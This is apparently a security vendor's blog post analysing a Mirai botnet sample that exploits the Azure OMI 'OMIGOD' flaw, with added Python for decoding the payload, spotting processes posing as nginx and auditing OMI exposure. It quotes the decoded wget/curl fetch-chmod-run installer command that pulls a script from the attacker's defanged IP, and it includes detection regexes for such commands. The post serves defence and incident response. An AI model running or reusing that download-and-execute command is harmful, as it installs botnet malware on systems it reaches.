Azure users running Linux virtual machines are at risk of compromise unless they upgrade now. A vulnerable piece of management software in the Open Management Infrastructure (OMI) framework can be remotely exploited by attackers, enabling them to escalate to root privileges and remotely execute malicious code.
Azure automatically installs the OMI agent when a user sets up a Linux VM with monitoring or certain other services enabled. By default, OMI runs with root access – making the system extremely vulnerable and subject to compromise. It typically listens on ports 5986, 5985, and 1270; however, any port can be used.
Incredibly, OMIGOD, discovered by researchers at Wiz, is exploited simply by sending requests without any authentication, which OMI then processes with root privileges across affected systems.
Below, our team analyses a real-world attack we have observed exploiting OMIGOD.
Mirai Botnet – Quick off the Mark
There is always a race among botnets to see who can compromise hosts first. Greynoise has reported on a number of systems that are either scanning for, or actively exploiting, OMIGOD.
One botnet operator is certainly attempting it, and credit goes to Germán Fernández for picking this one up:
Below we have analysed an x86 Mirai sample from http://212.192.241[.]72/bins/dark.x86.
The worm tries to spread to other systems through a number of vulnerabilities, including OMIGOD.
We can see the exploit code for OMIGOD after decompiling the sample with Retdec:
The parameter <p:command> contains the following command, encoded with base64:
wget http://212.192.241[.]72/lolol.sh; curl -O http://212.192.241[.]72/lolol.sh; chmod 777 lolol.sh; sh lolol.sh
Which is subsequently used to install the Mirai botnet via the URL:
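As an added example that is not part of the original analysis, the following Python shows how a defender can pull the base64-encoded value out of a `<p:command>` parameter, decode it and classify the result as a download-and-execute installer. The request body it parses is constructed here with a placeholder namespace (it is not the sample's real request), and the decoded command is the one quoted above, kept in its defanged `[.]` form.

```python
import base64
import re
import xml.etree.ElementTree as ET

# The command quoted above, kept in its defanged form ([.]) so nothing here can
# reach the real host.
OBSERVED_COMMAND = (
    "wget http://212.192.241[.]72/lolol.sh; curl -O http://212.192.241[.]72/lolol.sh; "
    "chmod 777 lolol.sh; sh lolol.sh"
)


def build_constructed_request(command: str) -> str:
    """Constructed test body, not the sample's real request: a bare element with a
    <p:command> child carrying the base64 of `command`. The namespace URI is a
    placeholder, not OMI's."""
    b64 = base64.b64encode(command.encode()).decode()
    return (
        '<request xmlns:p="urn:placeholder:params">'
        f"<p:command>{b64}</p:command>"
        "</request>"
    )


# Stages of a typical one-line bot installer: fetch, make executable, run.
DOWNLOAD_RE = re.compile(r"\b(wget|curl)\b[^;&|]*https?://", re.I)
CHMOD_RE = re.compile(r"\bchmod\s+(?:[0-7]*7[0-7]*|\+x)\b", re.I)
EXEC_RE = re.compile(r"\b(?:sh|bash)\s+\S+\.sh\b", re.I)
URL_RE = re.compile(r"https?://[^\s;|&]+")


def extract_commands(body: str) -> list[str]:
    """Decode the text of every element whose local name is 'command'.
    Values that are not valid base64 are returned as-is."""
    decoded = []
    for elem in ET.fromstring(body).iter():
        local_name = elem.tag.rsplit("}", 1)[-1]  # drop the {namespace} prefix
        text = (elem.text or "").strip()
        if local_name != "command" or not text:
            continue
        try:
            decoded.append(base64.b64decode(text, validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError subclass
            decoded.append(text)
    return decoded


def classify(command: str) -> dict:
    """Flag the three installer stages and collect URLs for the IoC list."""
    stages = {
        "downloads": bool(DOWNLOAD_RE.search(command)),
        "makes_executable": bool(CHMOD_RE.search(command)),
        "executes_script": bool(EXEC_RE.search(command)),
    }
    verdict = "download-and-execute" if all(stages.values()) else "review"
    return {**stages, "verdict": verdict, "urls": URL_RE.findall(command), "command": command}


def analyse_request(body: str) -> list[dict]:
    """One classification per <...:command> parameter found in the body."""
    return [classify(cmd) for cmd in extract_commands(body)]


if __name__ == "__main__":
    for result in analyse_request(build_constructed_request(OBSERVED_COMMAND)):
        print(result["verdict"], result["urls"])
```

The URL list the classifier returns is what you would feed into an indicators-of-compromise list; the element match is on the local name `command` only, so it works regardless of which namespace prefix a captured request uses.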
The file lolol.sh is a fairly standard Mirai installer that:
- Attempts to install across multiple possible architectures
- Hides itself as the legitimate web server “nginx”
- Closes the ports associated with the vulnerabilities it exploited, to stop other botnets taking over the system:
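Because the installer disguises its process as “nginx”, a useful forensic check on a suspect VM is to compare what a process calls itself with the binary that actually backs it. The Python below is an added example (not code from this post or from Cado Response): it reads `/proc` on a live host, and is exercised here against a constructed process table in which the path `/tmp/dark.x86` is made up from the sample name above. The list of legitimate nginx install paths is an assumption to adjust for your own builds.

```python
import os
from dataclasses import dataclass


@dataclass
class Proc:
    pid: int
    comm: str      # /proc/<pid>/comm: the short name ps and top display
    exe: str       # readlink(/proc/<pid>/exe): the binary actually executing
    cmdline: str   # /proc/<pid>/cmdline with NULs replaced by spaces


# Where a distro-packaged binary of each name normally lives (assumption for
# this example; add your own build's path if it differs).
LEGIT_PATHS = {
    "nginx": frozenset({
        "/usr/sbin/nginx",
        "/usr/local/sbin/nginx",
        "/usr/local/nginx/sbin/nginx",
    }),
}

# Constructed process table standing in for a compromised host. The path
# /tmp/dark.x86 is made up from the sample name above; only the first entry
# is a genuine web server.
CONSTRUCTED_PROCS = [
    Proc(812, "nginx", "/usr/sbin/nginx", "nginx: master process /usr/sbin/nginx -g daemon on;"),
    Proc(4471, "nginx", "/tmp/dark.x86 (deleted)", "nginx"),
    Proc(4490, "nginx", "/tmp/.x/dark.x86", "nginx"),
    Proc(1203, "sshd", "/usr/sbin/sshd", "/usr/sbin/sshd -D"),
]


def snapshot_procs() -> list[Proc]:
    """Read the live process table from /proc (Linux only; run as root to see
    every process's exe link)."""
    procs = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{pid}/comm") as f:
                comm = f.read().strip()
            exe = os.readlink(f"/proc/{pid}/exe")
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").decode("utf-8", "replace").strip()
        except OSError:
            continue  # kernel thread, process already gone, or no permission
        procs.append(Proc(int(pid), comm, exe, cmdline))
    return procs


def find_masquerading(procs: list[Proc], name: str = "nginx") -> list[tuple[Proc, str]]:
    """Return (process, reason) for every process that presents itself as `name`
    but whose backing executable does not match a known install path."""
    legit = LEGIT_PATHS.get(name, frozenset())
    findings = []
    for p in procs:
        argv0 = p.cmdline.split(" ", 1)[0] if p.cmdline else ""
        if p.comm != name and os.path.basename(argv0) != name:
            continue
        if p.exe.endswith(" (deleted)"):
            # Bots commonly unlink their binary after starting so it is not found on disk.
            findings.append((p, "executable was deleted after start"))
        elif p.exe not in legit:
            findings.append((p, f"executable {p.exe} is not a known {name} path"))
    return findings


if __name__ == "__main__":
    for proc, reason in find_masquerading(snapshot_procs()):
        print(f"pid {proc.pid}: {reason}")
```

The `(deleted)` suffix on the `exe` link is worth treating as a finding in its own right: a genuine nginx binary is not removed while the service runs, whereas a bot that unlinks itself after launch leaves exactly this trace.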
Ensure Microsoft Azure Firewall is set to block any access to OMI ports.
You can check whether the OMI agent is present on your Linux systems:
adminuser@main-vm:~$ sudo dpkg -l omi
dpkg-query: no packages found matching omi
If it is present, ensure it is running the latest version. Microsoft is not automatically updating insecure agents, and even systems deployed after the vulnerability was published may be vulnerable. Microsoft has provided guidance to customers in a post titled “Open Management Infrastructure Remote Code Execution Vulnerability”.
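The three steps above (block the ports, check whether the package is installed, confirm the version) can be run as one audit. The Python below is an added example, not part of this post or of any Microsoft tooling: it parses the output of `dpkg -l omi` and `ss -ltnp`, reports the installed version, and flags any listener that is either on one of the ports named above or owned by an OMI process, since the post notes that any port can be used. The process names `omiserver` and `omiengine` come from the OMI project rather than from this post, and the version string in the constructed sample output is a placeholder; compare the real value against the fixed version in Microsoft's advisory.

```python
import re
import subprocess

# Ports named above for OMI. The post also notes any port can be used, so the
# owning process name is checked too; omiserver/omiengine are the OMI project's
# process names (assumption for this example, not taken from the post).
OMI_PORTS = {5986, 5985, 1270}
OMI_PROCESS_NAMES = {"omiserver", "omiengine"}
LOOPBACK = {"127.0.0.1", "[::1]"}

# Constructed output of `dpkg -l omi` on a host with the agent installed. The
# version string is a placeholder, not a real OMI release.
CONSTRUCTED_DPKG = """\
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name  Version              Architecture Description
+++-=====-====================-============-==============================
ii  omi   0.0.0-PLACEHOLDER    amd64        Open Management Infrastructure
"""

# Constructed output of `ss -ltnp`: one standard-port listener exposed on all
# interfaces, one bound to loopback only, and one OMI process on a non-standard port.
CONSTRUCTED_SS = """\
State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22         0.0.0.0:*         users:(("sshd",pid=901,fd=3))
LISTEN 0      128    0.0.0.0:5986       0.0.0.0:*         users:(("omiserver",pid=1422,fd=6))
LISTEN 0      128    127.0.0.1:1270     0.0.0.0:*         users:(("omiengine",pid=1430,fd=7))
LISTEN 0      128    [::]:8080          [::]:*            users:(("omiserver",pid=1422,fd=8))
"""

PROCESS_RE = re.compile(r'users:\(\("([^"]+)"')


def omi_version(dpkg_output: str):
    """Installed version from `dpkg -l omi`, or None when the package is absent
    ('ii' is dpkg's installed state; 'un'/'rc' rows are not installed)."""
    for line in dpkg_output.splitlines():
        parts = line.split()
        if len(parts) >= 3 and parts[0] == "ii" and parts[1] == "omi":
            return parts[2]
    return None


def omi_listeners(ss_output: str) -> list[dict]:
    """Listeners that are on an OMI port or owned by an OMI process, with an
    `exposed` flag for anything not bound to loopback."""
    found = []
    for line in ss_output.splitlines()[1:]:  # skip the header row
        parts = line.split()
        if len(parts) < 5:
            continue
        addr, _, port = parts[3].rpartition(":")
        if not port.isdigit():
            continue
        match = PROCESS_RE.search(line)
        proc_name = match.group(1) if match else ""
        if int(port) in OMI_PORTS or proc_name in OMI_PROCESS_NAMES:
            found.append({
                "port": int(port),
                "process": proc_name,
                "exposed": addr not in LOOPBACK,
            })
    return found


def run(cmd: list[str]) -> str:
    """Run a command and return stdout; an absent tool yields empty output."""
    try:
        return subprocess.run(cmd, capture_output=True, text=True, check=False).stdout
    except FileNotFoundError:
        return ""


def audit(dpkg_output: str, ss_output: str) -> dict:
    """Combine the package check and the listener check into one report."""
    listeners = omi_listeners(ss_output)
    return {
        "omi_version": omi_version(dpkg_output),
        "listeners": listeners,
        "exposed": any(item["exposed"] for item in listeners),
    }


if __name__ == "__main__":
    # Live check on this host; compare omi_version with the fixed release in
    # Microsoft's advisory before deciding the agent is safe.
    print(audit(run(["dpkg", "-l", "omi"]), run(["ss", "-ltnp"])))
```

A listener bound only to loopback is still reported, because the agent should be patched regardless; the `exposed` flag just tells you which listeners the Azure firewall rule above needs to cover first.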
If you’d like to investigate potentially compromised machines, the full unlimited version of the Cado Response platform is now available for Azure via a free trial. The Cado Response platform does not run the OMI agent.
Indicators of Compromise